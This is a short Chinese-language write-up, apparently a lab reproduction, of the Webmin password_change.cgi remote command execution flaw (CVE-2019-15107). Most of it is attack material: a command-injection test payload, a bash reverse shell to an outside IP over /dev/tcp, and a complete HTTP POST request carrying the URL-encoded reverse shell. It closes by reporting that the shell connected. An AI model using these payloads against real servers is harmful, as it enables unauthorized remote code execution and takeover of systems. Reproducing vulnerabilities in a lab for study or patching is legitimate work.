webmin远程命令执行漏洞(CVE-2019-15107)

漏洞概述
1.漏洞编号：CVE-2019-15107
2.漏洞描述：该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码
该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞，该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码
3、受影响的版本：Webmin<=1.920
4，漏洞利用条件：版本满足要求，且服务器的配置文件允许修改密码时，在不知道webmin的用户和密码条件下，可以任意执行代码。
漏洞复现
https://10.95.14.161:26163/

漏洞验证
https://10.95.14.161:62680/password_change.cgi
user=rootxx&pam=&expired=2&old=text|ls&new1=test2&new2=test2

反弹shell
bash -c "bash -i >& /dev/tcp/43.138.56.101/4444 0>&1"

POST /password_change.cgi HTTP/1.1
Host: 10.95.14.161:62680
Cookie: redirect=1; testing=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Referer: https://10.95.14.161:62680/session_login.cgi
Connection: close
Content-Length: 138

user=rootxx&pam=&expired=2&old=bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F43.138.56.101%2F1099%200%3E%261%22&new1=test2&new2=test2

​

反弹shell成功

 

若有收获，就点个赞吧